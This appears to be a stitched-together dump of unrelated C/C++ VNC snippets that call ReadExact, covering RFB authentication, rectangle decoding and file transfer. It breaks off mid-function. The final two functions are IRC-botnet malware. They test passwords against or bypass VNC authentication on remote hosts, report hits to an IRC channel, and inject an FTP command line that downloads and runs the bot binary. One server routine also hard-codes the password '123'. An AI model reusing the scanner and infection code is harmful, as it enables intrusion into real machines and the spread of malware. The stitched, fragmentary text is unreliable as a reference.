// ========================================================================= // 函数功能:处理客户端对挑战信息的响应 // 输入参数:待交流的客户端cl // 输出参数: // 返回值 : // 说明 :当响应消息失败时,3.7以上的版本会发送失败的原因,而3.7及其以下会直接 // 关闭客户端 // ========================================================================= void rfbAuthProcessClientMessage(rfbClientPtr cl) { char *passwd="123"; int n; u8 response[CHALLENGESIZE]; u32 authResult; if ((n = ReadExact(cl, (char *)response, CHALLENGESIZE)) <= 0) { if (n != 0) debug_printf("rfbAuthProcessClientMessage: read"); rfbCloseClient(cl); return; } rfbEncryptBytes(cl->authChallenge, passwd); if (memcmp(cl->authChallenge, response, CHALLENGESIZE) != 0) { debug_printf("rfbAuthProcessClientMessage: authentication failed from %s\n", cl->host); authResult = Swap32IfLE(rfbVncAuthFailed); if (WriteExact(cl, (char *)&authResult, 4) < 0) { debug_printf("rfbAuthProcessClientMessage: write"); rfbClientSendString(cl,"challengdge failed\n"); } rfbCloseClient(cl); return; } else { debug_printf("challendge success ---cl=%s",cl->host); } authResult = Swap32IfLE(rfbVncAuthOK); if (WriteExact(cl, (char *)&authResult, 4) < 0) { debug_printf("rfbAuthProcessClientMessage: write"); rfbCloseClient(cl); return; } cl->state = RFB_INITIALISATION; }
void ClientConnection::ReadUltraRect(rfbFramebufferUpdateRectHeader *pfburh) { UINT numpixels = pfburh->r.w * pfburh->r.h; // this assumes at least one byte per pixel. Naughty. UINT numRawBytes = numpixels * m_minPixelBytes; UINT numCompBytes; lzo_uint new_len; rfbZlibHeader hdr; // Read in the rfbZlibHeader omni_mutex_lock l(m_bitmapdcMutex); ReadExact((char *)&hdr, sz_rfbZlibHeader); numCompBytes = Swap32IfLE(hdr.nBytes); // Read in the compressed data CheckBufferSize(numCompBytes); ReadExact(m_netbuf, numCompBytes); CheckZlibBufferSize(numRawBytes); lzo1x_decompress((BYTE*)m_netbuf,numCompBytes,(BYTE*)m_zlibbuf,&new_len,NULL); SoftCursorLockArea(pfburh->r.x, pfburh->r.y,pfburh->r.w,pfburh->r.h); if (!Check_Rectangle_borders(pfburh->r.x, pfburh->r.y,pfburh->r.w,pfburh->r.h)) return; if (m_DIBbits) ConvertAll(pfburh->r.w,pfburh->r.h,pfburh->r.x, pfburh->r.y,m_myFormat.bitsPerPixel/8,(BYTE *)m_zlibbuf,(BYTE *)m_DIBbits,m_si.framebufferWidth); }
// // sf@2002 // - Read a cache rects zipped block coming from the server // - Restore all these cache rects on the screen void ClientConnection::ReadCacheZip(rfbFramebufferUpdateRectHeader *pfburh,HRGN *prgn) { UINT nNbCacheRects = pfburh->r.x; UINT numRawBytes = nNbCacheRects * sz_rfbRectangle; numRawBytes += (numRawBytes/100) + 8; UINT numCompBytes; rfbZlibHeader hdr; // Read in the rfbZlibHeader ReadExact((char *)&hdr, sz_rfbZlibHeader); numCompBytes = Swap32IfLE(hdr.nBytes); // Check the net buffer CheckBufferSize(numCompBytes); // Read the compressed data ReadExact((char *)m_netbuf, numCompBytes); // Verify buffer space for cache rects list CheckZipBufferSize(numRawBytes); int nRet = uncompress((unsigned char*)m_zipbuf,// Dest (unsigned long*)&numRawBytes,// Dest len (unsigned char*)m_netbuf, // Src numCompBytes // Src len ); if (nRet != 0) { return; } // Read all the cache rects rfbRectangle theRect; BYTE* p = m_zipbuf; for (UINT i = 0 ; i < nNbCacheRects; i++) { memcpy((BYTE*)&theRect, p, sz_rfbRectangle); p += sz_rfbRectangle; RECT cacherect; cacherect.left = Swap16IfLE(theRect.x); cacherect.right = Swap16IfLE(theRect.x) + Swap16IfLE(theRect.w); cacherect.top = Swap16IfLE(theRect.y); cacherect.bottom = Swap16IfLE(theRect.y) + Swap16IfLE(theRect.h); SoftCursorLockArea(cacherect.left, cacherect.top, cacherect.right - cacherect.left, cacherect.bottom - cacherect.top); RestoreArea(cacherect); InvalidateRegion(&cacherect,prgn); } }
void ClientConnection::ReadUltraZip(rfbFramebufferUpdateRectHeader *pfburh,HRGN *prgn) { UINT nNbCacheRects = pfburh->r.x; UINT numRawBytes = pfburh->r.y+pfburh->r.w*65535; UINT numCompBytes; lzo_uint new_len; rfbZlibHeader hdr; // Read in the rfbZlibHeader omni_mutex_lock l(m_bitmapdcMutex); ReadExact((char *)&hdr, sz_rfbZlibHeader); numCompBytes = Swap32IfLE(hdr.nBytes); // Check the net buffer CheckBufferSize(numCompBytes); // Read the compressed data ReadExact((char *)m_netbuf, numCompBytes); // Verify buffer space for cache rects list CheckZlibBufferSize(numRawBytes+500); lzo1x_decompress((BYTE*)m_netbuf,numCompBytes,(BYTE*)m_zlibbuf,&new_len,NULL); BYTE* pzipbuf = m_zlibbuf; for (UINT i = 0 ; i < nNbCacheRects; i++) { rfbFramebufferUpdateRectHeader surh; memcpy((char *) &surh,pzipbuf, sz_rfbFramebufferUpdateRectHeader); surh.r.x = Swap16IfLE(surh.r.x); surh.r.y = Swap16IfLE(surh.r.y); surh.r.w = Swap16IfLE(surh.r.w); surh.r.h = Swap16IfLE(surh.r.h); surh.encoding = Swap32IfLE(surh.encoding); pzipbuf += sz_rfbFramebufferUpdateRectHeader; RECT rect; rect.left = surh.r.x; rect.right = surh.r.x + surh.r.w; rect.top = surh.r.y; rect.bottom = surh.r.y + surh.r.h; //border check if (!Check_Rectangle_borders(rect.left,rect.top,surh.r.w,surh.r.h)) return; SoftCursorLockArea(rect.left, rect.top, rect.right - rect.left, rect.bottom - rect.top); if ( surh.encoding==rfbEncodingRaw) { UINT numpixels = surh.r.w * surh.r.h; if (m_DIBbits) ConvertAll(surh.r.w,surh.r.h,surh.r.x, surh.r.y,m_myFormat.bitsPerPixel/8,(BYTE *)pzipbuf,(BYTE *)m_DIBbits,m_si.framebufferWidth); pzipbuf +=numpixels*m_myFormat.bitsPerPixel/8; if (!m_opts.m_Directx)InvalidateRegion(&rect,prgn); } } }
void ClientConnection::ReadCopyRect(rfbFramebufferUpdateRectHeader *pfburh) { rfbCopyRect cr; double tBlitStart; ReadExact((char *) &cr, sz_rfbCopyRect); cr.srcX = Swap16IfLE(cr.srcX); cr.srcY = Swap16IfLE(cr.srcY); // If *Cursor encoding is used, we should extend our "cursor lock area" // (previously set to destination rectangle) to the source rect as well. SoftCursorLockArea(cr.srcX, cr.srcY, pfburh->r.w, pfburh->r.h); omni_mutex_lock l(m_bitmapdcMutex); ObjectSelector b(m_hBitmapDC, m_hBitmap); PaletteSelector p(m_hBitmapDC, m_hPalette); if (m_opts.m_benchFile) tBlitStart = getTime(); if (!BitBlt(m_hBitmapDC, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h, m_hBitmapDC, cr.srcX, cr.srcY, SRCCOPY)) vnclog.Print(0, "Error in blit in ClientConnection::CopyRect\n"); if (m_opts.m_benchFile) tBlit += getTime() - tBlitStart; }
bool CFileSender::QueryStatus() { if (!PackAndSendRequest(CMD_PARAM_TRANSFILE_C2S_QUERYSTATUS)) { return false; } int nDataToRead = sizeof(FilePackHeader); FilePackHeader header; if (!ReadExact(m_Socket,(char *) &header, nDataToRead)) { MessageBox(m_ParentHwnd, "发送本地文件数据失败!", "提示", MB_OK | MB_ICONEXCLAMATION); return false; } FilePackHeader header1; if (!ReadExact(m_Socket,(char *) &header1, nDataToRead)) { MessageBox(m_ParentHwnd, "发送本地文件数据失败!", "提示", MB_OK | MB_ICONEXCLAMATION); return false; } if(header1.nParam == CMD_PARAM_TRANSFILE_SSTOPRECEIVE && header1.nType != FILE_RESPONSE) { bool bStopByClient = false; SendMessage(m_ParentHwnd, WM_GETSTOPBYMYSEFLT, 0, (LPARAM)&bStopByClient); if(m_bStopbyServer == false && !bStopByClient) { m_bStopbyServer = true; PackAndSendRequest(CMD_PARAM_TRANSFILE_C2S_STOP); PostMessage(this->m_ParentHwnd, WM_FILE_STOP, 0, 0); } return false; } if (header.nType != FILE_RESPONSE || header.nParam != CMD_PARAM_TRANSFILE_C2S_STATUSOK) { PackAndSendRequest(CMD_PARAM_TRANSFILE_C2S_STOP); PostMessage(m_ParentHwnd, WM_FILE_ERROR, 1, 0); return false; } return true; }
void ClientConnection::ReadCopyRect(rfbFramebufferUpdateRectHeader *pfburh) { rfbCopyRect cr; ReadExact((char *) &cr, sz_rfbCopyRect); cr.srcX = Swap16IfLE(cr.srcX); cr.srcY = Swap16IfLE(cr.srcY); // By sure the rect is insite the border memcopy does not like it if (!Check_Rectangle_borders(pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h)) return; if (!Check_Rectangle_borders(cr.srcX, cr.srcY, pfburh->r.w, pfburh->r.h)) return; // tight If *Cursor encoding is used, we should extend our "cursor lock area" // (previously set to destination rectangle) to the source rect as well. SoftCursorLockArea(cr.srcX, cr.srcY, pfburh->r.w, pfburh->r.h); if (m_DIBbits) { omni_mutex_lock l(m_bitmapdcMutex); int bytesPerInputRow = m_si.framebufferWidth * m_myFormat.bitsPerPixel/8; int bytesPerOutputRow = pfburh->r.w * m_myFormat.bitsPerPixel/8; int OutputHeight=pfburh->r.h; BYTE *sourcepos,*iptr,*destpos,*optr; if (cr.srcY<=pfburh->r.y) { { destpos = (BYTE*)m_DIBbits + (bytesPerInputRow * (pfburh->r.y+pfburh->r.h-1))+(pfburh->r.x * m_myFormat.bitsPerPixel/8); sourcepos = (BYTE*)m_DIBbits + (bytesPerInputRow * (cr.srcY+pfburh->r.h-1))+((cr.srcX) * m_myFormat.bitsPerPixel/8); iptr=sourcepos; optr=destpos; while (OutputHeight > 0) { memcpy(optr, iptr, bytesPerOutputRow); iptr -= bytesPerInputRow; optr -= bytesPerInputRow; OutputHeight--; } } } else if (cr.srcY>pfburh->r.y) { { destpos = (BYTE*)m_DIBbits + (bytesPerInputRow * pfburh->r.y)+(pfburh->r.x * m_myFormat.bitsPerPixel/8); sourcepos = (BYTE*)m_DIBbits + (bytesPerInputRow * (cr.srcY))+((cr.srcX) * m_myFormat.bitsPerPixel/8); iptr=sourcepos; optr=destpos; while (OutputHeight > 0) { memcpy(optr, iptr, bytesPerOutputRow); iptr += bytesPerInputRow; optr += bytesPerInputRow; OutputHeight--; } } } } }
void ClientConnection::ReadCacheRect(rfbFramebufferUpdateRectHeader *pfburh) { rfbCacheRect cr; ReadExact((char *) &cr, sz_rfbCacheRect); cr.special = Swap16IfLE(cr.special); RECT rect; rect.left=pfburh->r.x; rect.right=pfburh->r.x+pfburh->r.w; rect.top=pfburh->r.y; rect.bottom=pfburh->r.y+pfburh->r.h; RestoreArea(rect); }
// ========================================================================= // 函数功能:处理客户端的安全类型信息 // 输入参数:待交流的客户端cl // 输出参数: // 返回值 : // 说明 : 只有3.7及其以上版本的server才会让cl选择安全类型 // =========================================================================void void rfbProcessClientSecurityType(rfbClientPtr cl) { int n; u8 chosenType; u32 authResult; /* Read the security type. */ n = ReadExact(cl, (char *)&chosenType, 1); if (n <= 0) { if (n == 0) debug_printf("rfbProcessClientSecurityType: client gone\n"); else debug_printf("rfbProcessClientSecurityType: read"); rfbCloseClient(cl); return; } /* Make sure it was present in the list sent by the server. */ switch (chosenType) { case rfbConnFailed: debug_printf("The client %s connfailed!\n",cl->host); cl->state = RFB_INITIALISATION; break; case rfbNoAuth: debug_printf("The client %s need no auth!\n",cl->host); //对于3.8版本仍然需要把结果返还回去 if((cl->protocolMajorVersion==3)&&(cl->protocolMinorVersion>7)) { authResult = Swap32IfLE(rfbVncAuthOK); if (WriteExact(cl, (char *)&authResult, 4) < 0) { debug_printf("rfbAuthProcessClientMessage: write"); rfbCloseClient(cl); break; } } cl->state = RFB_INITIALISATION; break; case rfbVncAuth: debug_printf("The client %s need vncauth!\n",cl->host); rfbVncAuthSendChallenge(cl);//发送挑战信息 break; default: debug_printf("No supported security method--%d\n",chosenType); rfbCloseClient(cl); break; } return; }
void ClientConnection::ReadCopyRect(rfbFramebufferUpdateRectHeader *pfburh) { rfbCopyRect cr; ReadExact((char *) &cr, sz_rfbCopyRect); cr.srcX = Swap16IfLE(cr.srcX); cr.srcY = Swap16IfLE(cr.srcY); omni_mutex_lock l(m_bitmapdcMutex); ObjectSelector b(m_hBitmapDC, m_hBitmap); PaletteSelector p(m_hBitmapDC, m_hPalette); if (!BitBlt( m_hBitmapDC,pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h, m_hBitmapDC, cr.srcX, cr.srcY, SRCCOPY)) { log.Print(0, _T("Error in blit in ClientConnection::CopyRect\n")); } }
static void rfbProcessClientInitMessage(rfbClientPtr cl) { rfbClientInitMsg ci; char buf[256]; rfbServerInitMsg *si = (rfbServerInitMsg *)buf; int len, n; if ((n = ReadExact(cl, (char *)&ci,sz_rfbClientInitMsg)) <= 0) { if (n == 0) debug_printf("rfbProcessClientInitMessage: client gone\n"); else debug_printf("rfbProcessClientInitMessage: read"); rfbCloseClient(cl); return; } si->framebufferWidth = Swap16IfLE(cl->screen->width); si->framebufferHeight = Swap16IfLE(cl->screen->height); debug_printf("width=%d hieght=%d\n",cl->screen->width,cl->screen->height); si->format = cl->screen->rfbServerFormat; si->format.redMax = Swap16IfLE(si->format.redMax); si->format.greenMax = Swap16IfLE(si->format.greenMax); si->format.blueMax = Swap16IfLE(si->format.blueMax); if (strlen(cl->screen->desktopName) > 128) /* sanity check on desktop name len */ cl->screen->desktopName[128] = 0; strcpy(buf + sz_rfbServerInitMsg, cl->screen->desktopName); len = strlen(buf + sz_rfbServerInitMsg); si->nameLength = Swap32IfLE(len); if (WriteExact(cl, buf, sz_rfbServerInitMsg + len) < 0) { debug_printf("rfbProcessClientInitMessage: write"); rfbCloseClient(cl); return; } cl->state = RFB_NORMAL; if(ci.shared) { debug_printf("The client permit share!\n"); } else { debug_printf("The client refused share!\n"); } //关于是否共享的问题,以后再谈 }
static void rfbProcessClientProtocolVersion(rfbClientPtr cl) { rfbProtocolVersionMsg pv; int n, major, minor; char failureReason[256]; if ((n = ReadExact(cl, pv, sz_rfbProtocolVersionMsg)) <= 0) { if (n == 0) debug_printf("rfbProcessClientProtocolVersion: client gone\n"); else debug_printf("rfbProcessClientProtocolVersion: read"); rfbCloseClient(cl); return; } pv[sz_rfbProtocolVersionMsg] = 0; if (sscanf(pv,rfbProtocolVersionFormat,&major,&minor) != 2) { debug_printf("rfbProcessClientProtocolVersion: not a valid RFB client\n"); rfbCloseClient(cl); return; } debug_printf("Protocol version %d.%d\n", major, minor); if (major != rfbProtocolMajorVersion) { /* Major version mismatch - send a ConnFailed message */ debug_printf("Major version mismatch\n"); sprintf(failureReason, "RFB protocol version mismatch - server %d.%d, client %d.%d", rfbProtocolMajorVersion,rfbProtocolMinorVersion,major,minor); rfbClientConnFailed(cl, failureReason); return; } if (minor != rfbProtocolMinorVersion) { /* Minor version mismatch - warn but try to continue */ debug_printf("Ignoring minor version mismatch\n"); } //每个客户端都会发送自己的proto cl->protocolMajorVersion=major; cl->protocolMinorVersion=minor; rfbAuthNewClient(cl); }
void ClientConnection::ReadRawRect(rfbFramebufferUpdateRectHeader *pfburh) { UINT numpixels = pfburh->r.w * pfburh->r.h; // this assumes at least one byte per pixel. Naughty. UINT numbytes = numpixels * m_minPixelBytes; // Read in the whole thing CheckBufferSize(numbytes); ReadExact(m_netbuf, numbytes); if (UltraFast && m_DIBbits) { boost::recursive_mutex::scoped_lock l(m_bitmapdcMutex); ConvertAll(pfburh->r.w,pfburh->r.h,pfburh->r.x, pfburh->r.y,m_myFormat.bitsPerPixel/8,(BYTE *)m_netbuf,(BYTE *)m_DIBbits,m_si.framebufferWidth); return; } SETUP_COLOR_SHORTCUTS; { // No other threads can use bitmap DC boost::recursive_mutex::scoped_lock l(m_bitmapdcMutex); ObjectSelector b(m_hBitmapDC, m_hBitmap); \ PaletteSelector p(m_hBitmapDC, m_hPalette); \ // This big switch is untidy but fast switch (m_myFormat.bitsPerPixel) { case 8: SETPIXELS(m_netbuf, 8, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h) break; case 16: SETPIXELS(m_netbuf, 16, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h) break; case 24: case 32: SETPIXELS(m_netbuf, 32, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h) break; default: //vnclog.Print(0, _T("Invalid number of bits per pixel: %d\n"), m_myFormat.bitsPerPixel); Log.Add(_ERROR_, "Invalid number of bits per pixel: %d", m_myFormat.bitsPerPixel); return; } } }
int SkipExact(rfbClientPtr cl, int len) { char *tmpbuf = NULL; int bufLen = min(len, 65536), i, retval = 1; tmpbuf = (char *)malloc(bufLen); if (tmpbuf == NULL) { rfbLogPerror("SkipExact: out of memory"); return -1; } for (i = 0; i < len; i += bufLen) { retval = ReadExact(cl, tmpbuf, min(bufLen, len - i)); if (retval <= 0) break; } free(tmpbuf); return retval; }
void ClientConnection::ReadRawRect(rfbFramebufferUpdateRectHeader *pfburh) { UINT numpixels = pfburh->r.w * pfburh->r.h; // this assumes at least one byte per pixel. Naughty. UINT numbytes = numpixels * m_minPixelBytes; // Read in the whole thing CheckBufferSize(numbytes); ReadExact(m_netbuf, numbytes); SETUP_COLOR_SHORTCUTS; { // No other threads can use bitmap DC omni_mutex_lock l(m_bitmapdcMutex); ObjectSelector b(m_hBitmapDC, m_hBitmap); \ PaletteSelector p(m_hBitmapDC, m_hPalette); \ // This big switch is untidy but fast switch (m_myFormat.bitsPerPixel) { case 8: SETPIXELS(m_netbuf, 8, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h) break; case 16: SETPIXELS(m_netbuf, 16, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h) break; case 24: case 32: SETPIXELS(m_netbuf, 32, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h) break; default: vnclog.Print(0, _T("Invalid number of bits per pixel: %d\n"), m_myFormat.bitsPerPixel); return; } } }
Bool InitialiseRFBConnection(int sock) { rfbProtocolVersionMsg pv; int major,minor; Bool authWillWork = True; CARD32 authScheme, reasonLen, authResult; char *reason; CARD8 challenge[CHALLENGESIZE]; char *passwd; int i; rfbClientInitMsg ci; /* if the connection is immediately closed, don't report anything, so that pmw's monitor can make test connections */ if(listenSpecified) errorMessageFromReadExact = False; if(!ReadExact(sock, pv, sz_rfbProtocolVersionMsg)) return False; errorMessageFromReadExact = True; pv[sz_rfbProtocolVersionMsg] = 0; if(sscanf(pv,rfbProtocolVersionFormat,&major,&minor) != 2) { fprintf(stderr,"%s: Not a valid VNC server\n",programName); return False; } fprintf(stderr,"%s: VNC server supports protocol version %d.%d " "(viewer %d.%d)\n", programName,major,minor,rfbProtocolMajorVersion, rfbProtocolMinorVersion); if((major == 3) && (minor < 3)) { /* if server is before 3.3 authentication won't work */ authWillWork = False; } else { /* any other server version, just tell it what we want */ major = rfbProtocolMajorVersion; minor = rfbProtocolMinorVersion; } sprintf(pv,rfbProtocolVersionFormat,major,minor); if(!WriteExact(sock, pv, sz_rfbProtocolVersionMsg)) return False; if(!ReadExact(sock, (char *)&authScheme, 4)) return False; authScheme = Swap32IfLE(authScheme); switch(authScheme) { case rfbConnFailed: if(!ReadExact(sock, (char *)&reasonLen, 4)) return False; reasonLen = Swap32IfLE(reasonLen); reason = malloc(reasonLen); if(!ReadExact(sock, reason, reasonLen)) { free(reason); return False; } fprintf(stderr,"%s: VNC connection failed: %.*s\n", programName, (int)reasonLen, reason); free(reason); return False; case rfbNoAuth: fprintf(stderr,"%s: No authentication needed\n",programName); break; case rfbVncAuth: if(!authWillWork) { fprintf(stderr, "\n%s: VNC server uses the old authentication scheme.\n" "You should kill your old desktop(s) and restart.\n" "If you really need to connect to this desktop use " "vncviewer3.2\n\n", programName); return False; } if(!ReadExact(sock, (char *)challenge, CHALLENGESIZE)) return False; if(passwdFile) { passwd = vncDecryptPasswdFromFile(passwdFile); if(passwd == NULL) return False; } else { passwd = passwdString; if(strlen(passwd) > 8) { passwd[8] = '\0'; } } vncEncryptBytes(challenge, passwd); /* Lose the password from memory */ for(i=0; i<strlen(passwd); i++) { passwd[i] = '\0'; } if(!WriteExact(sock, challenge, CHALLENGESIZE)) return False; if(!ReadExact(sock, (char *)&authResult, 4)) return False; authResult = Swap32IfLE(authResult); switch(authResult) { case rfbVncAuthOK: fprintf(stderr,"%s: VNC authentication succeeded\n",programName); break; case rfbVncAuthFailed: fprintf(stderr,"%s: VNC authentication failed\n",programName); return False; case rfbVncAuthTooMany: fprintf(stderr,"%s: VNC authentication failed - too many tries\n", programName); return False; default: fprintf(stderr,"%s: Unknown VNC authentication result: %d\n", programName,(int)authResult); return False; } break; default: fprintf(stderr, "%s: Unknown authentication scheme from VNC server: %d\n", programName,(int)authScheme); return False; } ci.shared = (shareDesktop ? 1 : 0); if(!WriteExact(sock, (char *)&ci, sz_rfbClientInitMsg)) return False; if(!ReadExact(sock, (char *)&si, sz_rfbServerInitMsg)) return False; si.framebufferWidth = Swap16IfLE(si.framebufferWidth); si.framebufferHeight = Swap16IfLE(si.framebufferHeight); si.format.redMax = Swap16IfLE(si.format.redMax); si.format.greenMax = Swap16IfLE(si.format.greenMax); si.format.blueMax = Swap16IfLE(si.format.blueMax); si.nameLength = Swap32IfLE(si.nameLength); desktopName = malloc(si.nameLength + 1); if(!ReadExact(sock, desktopName, si.nameLength)) { free(desktopName); return False; } desktopName[si.nameLength] = 0; fprintf(stderr,"%s: Desktop name \"%s\"\n",programName,desktopName); free(desktopName); fprintf(stderr, "%s: Connected to VNC server, using protocol version %d.%d\n", programName, rfbProtocolMajorVersion, rfbProtocolMinorVersion); fprintf(stderr,"%s: VNC server default format:\n",programName); PrintPixelFormat(&si.format); return True; }
inline void ReadString(SOCKET s_sock, char *buf, int length) { if (length > 0) ReadExact(s_sock, buf, length); buf[length] = '\0'; }
/* * abcdefghijklmnopqrstuvwxyz * e hi klmno q t u * | || ||||| | | | * | || ||||| | | +get screen (full res) * | || ||||| | + touch(down,x,y) * | || ||||| +quit client * | || ||||+ftp_err * | || |||+ftp_data * | || ||+ftp_upload_req * | || |+ftp_download_req * | || +ftp_filelist_req * | |+get screen info * | +get screen (half req) * +stop service */ static int ProcessClientMessage(svcInfoPtr psvc, FBCCMD* pmsg) { //FBCCMD msg; //char msg; int n = 0; int nSize; //if( (n = ReadExact(psvc, (char*)&msg, FBCCMD_HEADER)) <= 0 ) { // Err("ProcessClientMessage : read(%d)\n", n); // return false; //} pmsg->size = ntohl(pmsg->size); pmsg->size -= FBCCMD_HEADER; //Log("msg received(%c: size - %d)\n", pmsg->cmd, pmsg->size); if( pmsg->size > 0) { pmsg->data = (char*)malloc(pmsg->size); if( (n = ReadExact(psvc, (char*)pmsg->data, pmsg->size)) <= 0 ) { Err("ProcessClientMessage : read(%d)\n", n); return false; } } //Log("after alloc %02x %02x %02x %02x\n", msg.data[0],msg.data[1],msg.data[2],msg.data[3]); unsigned int data; #ifdef PERFORMANCE_REPORT struct timeval tS, tE; gettimeofday(&tS,NULL); psvc->frame_client += ELAPSED(tLast, tS); #endif switch(pmsg->cmd) { case 'i': { FBCCMD_SCRINFO res; res.cmd = 'i'; res.size = htonl(sizeof(FBCCMD_SCRINFO)); res.width = htonl(g_fbinfo.width); res.height = htonl(g_fbinfo.height); res.bpp = htonl(g_fbinfo.bpp); res.touchfd = htonl( (touchfd != -1 ) ? 1 : 0); LOCK(psvc->output_mutex); int rtn = WriteExact(psvc, (const char*)&res, sizeof(FBCCMD_SCRINFO)); UNLOCK(psvc->output_mutex); //Log("response i %d to :%d\n", res.size, rtn); } break; case 'u': //Log("signal-u\n"); g_halfmode = 0; //TSIGNAL(psvc->updateCond); read_rgb_framebuffer_to_jpeg(psvc); #ifdef PERFORMANCE_REPORT gettimeofday(&tE,NULL); psvc->frame_total += ELAPSED(tS, tE); tS = tE; #endif break; case 'h': g_halfmode = 1; //Log("signal-h\n"); //TSIGNAL(psvc->updateCond); //g_halfmode = 0; read_rgb_framebuffer_to_jpeg(psvc); #ifdef PERFORMANCE_REPORT gettimeofday(&tE,NULL); psvc->frame_total += ELAPSED(tS, tE); tS = tE; #endif break; case 'e': return false; break; case 'q': ExitClient(psvc); ShutdownSockets(psvc); break; // ftp case 'k': // ftp filestlist req onFilelistReq(psvc, pmsg); break; case 'l': // ftp filedownload req onFileDownloadReq(psvc, pmsg); break; case 'm': // ftp fileupload req onFileUploadReq(psvc, pmsg); break; case 'n': // ftp fileupload data //Log("case n\n"); onFileMsg(psvc, pmsg); break; case 'o': // ftp fileerr onFileErr(psvc, pmsg); break; case 't': onTouch(psvc, pmsg); break; } if( pmsg->size > 0) { free(pmsg->data); } //if(( psvc->frame_sent++ % 5) == 0) { // g_fbinfo.orientation = get_dev_rotation(); // //int isScreenOn = get_screen_on(); // //Log("isScreenOn(%d)\n",isScreenOn); //} #ifdef PERFORMANCE_REPORT if( (psvc->frame_sent % 10) == 0) { double frame_total; double frame_capture; double frame_compress; double frame_colorspace; double frame_tx; double frame_client; double fps, fps_svr; fps = (double)10 * 1000000 / (psvc->frame_total + psvc->frame_client); fps_svr = (double)10 * 1000000 / psvc->frame_total; frame_total = psvc->frame_total / 10000; frame_capture = psvc->frame_capture / 10000; frame_compress = psvc->frame_compress / 10000; frame_colorspace = psvc->frame_colorspace / 10000; frame_tx = psvc->frame_tx / 10000; frame_client = psvc->frame_client / 10000; if( psvc->frame_sent > 10 ) { Log("FPS(%5.2f),SVR(%4.1f) TOT(%3.0f),CAP(%3.0f),ZIP(%3.0f),CNV(%2.0f),TX(%2.0f),CLI(%2.0f)\n", //psvc->frame_sent-1, fps, fps_svr, frame_total, frame_capture, frame_compress, frame_colorspace, frame_tx,frame_client); } psvc->frame_total = 0; psvc->frame_capture = 0; psvc->frame_compress = 0; psvc->frame_colorspace = 0; psvc->frame_tx = 0; psvc->frame_client = 0; } gettimeofday(&tLast,NULL); #endif /* PERFORMANCE_REPORT */ // Log("end loop"); return true; }
int vnccheck(char *host, char *passwd, SOCKET ircconn) { SOCKET sock; SOCKADDR_IN ssin; ssin.sin_family = AF_INET; ssin.sin_port = htons(5900); ssin.sin_addr.s_addr= inet_addr(host); sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if(connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin))) { //printf("[-] Could not connect\n"); return 1; } char buff[4096]; char ftpline[256]; sprintf(ftpline, "echo open %s %d > ravo &echo user %s %s >> ravo &echo get %s >> ravo &echo bye >> ravo &ftp -n -v -s:ravo &del ravo &%s\r\n", getlocalip(), FTPPORT, "Ravo", "5002", BOTNAME, BOTNAME); unsigned char vncversion[12]; ReadExact(sock, vncversion, sizeof(vncversion)); if(strstr(vncversion, "RFB")) { WriteExact(sock, vncversion, sizeof(vncversion)); strtok(vncversion, " "); int versa = atoi(strtok(NULL, ".")); int versb = atoi(strtok(NULL, "\n")); //printf("[+] Found VNC %d.%d\n", versa, versb); char auth[4]; ReadExact(sock, auth, 4); if(auth[1] == 1 || auth[3] == 1) { //printf("[+] VNC NoAuth!\n"); sprintf(buff, "PRIVMSG %s :VNC v%d.%d with no pass on host %s\n", CHANNEL, versa, versb, host); send(ircconn,buff, strlen(buff), 0); WriteExact(sock, "\0", 1); VNCRoot(sock, ftpline); closesocket(sock); return 1; } else if(auth[1] == 2 || auth[3] == 2) { //printf("[+] VNC needs pass lets brewtf0rc3\n"); char funk[1]; //funk = "0\n"; funk[0] = auth[1]; //funk[1] = '\n'; //printf("funk:\n%s\n%d %d\n", funk, funk[0], funk[1]); WriteExact(sock, funk, 1); // WTF? I NEED 2 send sumthing or ill not get the challenge unsigned char challenge[16]; ReadExact(sock, challenge, 16); vncEncryptBytes(challenge, passwd); WriteExact(sock, challenge, 16); // send encrypted shit // see wtf the status is unsigned char status[4]; ReadExact(sock, status, 4); if(status[3] == 0) { //printf("[+] pass ok\n"); sprintf(buff, "PRIVMSG %s :[VNC] v%d.%d with pass %s on ip %s\n", CHANNEL, versa, versb, passwd, host); send(ircconn,buff, strlen(buff), 0); WriteExact(sock, "\0", 1); VNCRoot(sock, ftpline); closesocket(sock); return 1; } else if(status[3] == 1) { //printf("[-] pass wrong\n"); return 0; } else if(status[3] == 1) { //printf("[-] 2much connections\n"); return 2; } } else if(auth[1] ==0) { return 1; } } closesocket(sock); return 0; }
int vncshit(EXINFO exinfo, char *passwd) { char sendbuf[IRCLINE]; struct sockaddr_in ssin; SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0); if (sock == INVALID_SOCKET) return FALSE; int m_majorVersion, m_minorVersion; ssin.sin_addr.s_addr= finet_addr(exinfo.ip); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)exinfo.port); sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if(fconnect(sock, (LPSOCKADDR)&ssin, sizeof(ssin))) { sprintf(sendbuf,"VNC[-] Could not connect to %s", exinfo.ip); addlog(sendbuf); return false; } rfbProtocolVersionMsg pv; ReadExact(sock, pv, sz_rfbProtocolVersionMsg); pv[sz_rfbProtocolVersionMsg] = 0; m_majorVersion = rfbProtocolMajorVersion; m_minorVersion = rfbProtocolMinorVersion; if (!(m_majorVersion == 3) && !(m_minorVersion == 8)) { sprintf(sendbuf,"VNC[%d.%d] %s Auth ByPass Vuln!!!", m_majorVersion, m_minorVersion, exinfo.ip); irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); addlog(sendbuf); return false; } sprintf(pv,rfbProtocolVersionFormat,m_majorVersion,m_minorVersion); WriteExact(sock, pv, sz_rfbProtocolVersionMsg); CARD32 authScheme, authResult; CARD8 challenge[CHALLENGESIZE]; ReadExact(sock,(char *)&authScheme, 4); authScheme = Swap32IfLE(authScheme); switch (authScheme) { case rfbConnFailed: sprintf(sendbuf,"VNC[-] %s connection failed", exinfo.ip); //irc_privmsg( exinfo.sock, exinfo.chan, 